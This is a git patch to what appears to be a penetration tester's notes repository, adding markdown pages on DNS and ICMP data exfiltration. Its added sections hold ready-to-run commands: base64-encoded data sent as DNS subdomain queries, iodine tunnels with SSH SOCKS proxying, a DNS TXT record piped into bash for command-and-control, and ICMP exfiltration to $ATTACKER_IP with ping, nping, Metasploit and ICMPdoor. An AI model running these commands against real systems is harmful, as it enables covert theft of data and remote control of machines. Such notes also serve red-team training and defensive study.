From 5236e6a477b6158c01b77c462c52d19a7b4fba8d Mon Sep 17 00:00:00 2001 From: whx Date: Tue, 30 Aug 2022 22:16:10 +0200 Subject: [PATCH] bump --- exfiltration/dns/dns.md | 113 +++++++++++++++++++++++++++++++--------- exfiltration/icmp.md | 64 +++++++++++++++++++++++ exfiltration/links.txt | 1 + 3 files changed, 153 insertions(+), 25 deletions(-) create mode 100644 exfiltration/icmp.md create mode 100644 exfiltration/links.txt diff --git a/exfiltration/dns/dns.md b/exfiltration/dns/dns.md index d5436f6..3a1a9e2 100644 --- a/exfiltration/dns/dns.md +++ b/exfiltration/dns/dns.md @@ -4,35 +4,16 @@ * [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/) * [Records](https://www.cloudflare.com/learning/dns/dns-records/) -## Tunneling -* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git) -* Start server on an outside DNS server. This may be a evs. -```sh -iodined -b 47110-f 10.0.0.1 tunnel.test.com -``` -* Use client via -```sh -iodine -f -r tunnel.test.com -``` -* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com` -* Client gets a tunnel IP in the range of `10.0.0.0/8` -* Check connection via -```sh -ping -``` -* Generate ssh-key and put in on the server -* Dynamic port forwarding to server via -```sh -ssh @10.0.0.1 -D 8080 -``` -* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy +## Queries + +### nslookup -## nslookup ```sh nslookup type=txt ``` -## Reverse lookup +### Reverse lookup + * Stored inside `PTR` record * Reverse IP may look like `.in-addr.arpa.`, but not via `drill` or `dig` ```sh @@ -40,10 +21,92 @@ drill -x +short ``` ## Exfiltration + * Add data to UDP DNS requests * Capture traffic on an owned DNS server -* `253` is the max length of a DNS name +* `253` is the max length of a DNS name, excluding dots +* `63` is the mx length of subdomains * Encode the payload to hide it ## Infiltration + * Inside `TXT` or any other possible records + +## Usage + +### Manual Tunneling + +Preconditions are: + 1. Domain with an `A` record + 2. `NS` record to controlled DNS to resolve the domain query + +* Attach the encoded payload as the subdomain +```sh +base64 -w0 | fold -w 24 | sed -r 's/.*/&.example.com/' +``` + +* Query the DNS server +```sh +base64 -w0 | fold -w 24 | sed -r 's/.*/&.example.com/' | awk '{print "dig +short $1"}' | bash +``` + +* Optionally putting the payload in a single query via +```sh +base64 -w0 | fold -w 24 | sed 's/.*/&./' | tr -d '\n' | sed 's/$/example.com/' | awk '{print "dig +short" $1}' | bash +``` + +* Decode received data on the controlled DNS server via +```sh +echo "DomainBase64encoded.example.com" | sed 's/\.example\.com//;s/\.//g' | base64 -d +``` + +### Tunneling via Iodine + +* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git) +* Encapsulate protocols in side the DNS tunnel + +* Start server on an outside DNS server. This may be a evs. +```sh +iodined -b -f 10.0.0.1 -c -P tunnel.test.com +``` + +* Use client via +```sh +iodine -f -r -P tunnel.test.com +``` + +* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com` +* Client gets a tunnel IP in the range of `10.0.0.0/8` +* Check connection via +```sh +ping +``` + +* Generate ssh-key and put in on the server +* Dynamic port forwarding to the network through the server as a proxy via ssh +```sh +ssh @10.0.0.1 -4 -f -N -D <8080/1080> +``` + +* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy, or proxychains +```sh +proxychains curl http://$TARGET_IP/ +curl --socks5 localhost:1080 http://$ +``` + +### C2 over DNS + +* Preconditions are the same as [Manual Tunneling](#Manual Tunneling) + * Plus: Data to control the appliances will be put into `TXT` record + * Data to control the appliances may be a shell script sending payloads via ICMP data field, DNS subdomains or execute something locally on the target + +* Encode the payload and add it as `TXT` record +```sh +base64 ./script.sh +``` + +* Query and execute on target +```sh +dig +short -t TXT script.example.com | sed 's/\"//g'| base64 -d | bash +``` + diff --git a/exfiltration/icmp.md b/exfiltration/icmp.md new file mode 100644 index 0000000..b667f4a --- /dev/null +++ b/exfiltration/icmp.md @@ -0,0 +1,64 @@ +# ICMP Exfiltration + +* [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtm) + +* Type 0, which is Echo Reply contains an optional data field inside the header +``` + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Type | Code | Checksum | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Identifier | Sequence Number | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| | ++ Data + +| | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +``` + +## Usage + +* The `Pattern` parameter can be used to pad the bytes. From the manual +``` + -p pattern + You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing + data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones. +``` + +* Pad hex values +```sh +ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p ) +``` + +### Metasploit ICMP Exfiltration + +* Awaiting ICMP data on Attacker +```sh +use auxiliary/server/icmp_exfil +set BPF_FILTER icmp and not src $ATTACKER_IP +set interface +run +``` + +* Exfiltrating from target via `ping` shown above or use `nping` +* Starting the transmission via `nping` and BOF +```sh +sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt" +sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload" +sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF" +``` + +### C2 over ICMP + +* Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor) + +* On target +```sh +sudo icmpdoor -i -d $ATTACKER_IP +``` + +* On attacker +```sh +sudo icmp-cnc -i -d $TARGET_IP +``` diff --git a/exfiltration/links.txt b/exfiltration/links.txt new file mode 100644 index 0000000..dfbc500 --- /dev/null +++ b/exfiltration/links.txt @@ -0,0 +1 @@ +https://lots-project.com/